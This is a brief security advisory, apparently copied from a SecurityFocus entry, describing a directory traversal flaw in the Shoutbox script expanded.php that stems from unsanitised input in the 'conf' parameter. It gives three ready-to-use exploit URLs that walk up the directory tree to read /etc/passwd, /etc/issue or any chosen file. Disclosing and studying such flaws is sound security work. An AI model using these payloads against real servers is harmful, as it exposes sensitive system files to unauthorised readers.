9 lines
No EOL
538 B
Text
9 lines
No EOL
538 B
Text
source: https://www.securityfocus.com/bid/7775/info
|
|
|
|
A problem in Shoutbox may result in traversal attacks. The vulnerability exists due to insufficient sanitization of user-supplied values to the expanded.php script, and could allow the viewing of potentially sensitive files by attackers.
|
|
|
|
http://www.example.com/shoutbox/expanded.php?conf=../../../../../../../targetfile
|
|
|
|
http://www.example.com/shoutbox/expanded.php?conf=../../../../../../../etc/passwd
|
|
|
|
http://www.example.com/shoutbox/expanded.php?conf=../../../../../../../etc/issue |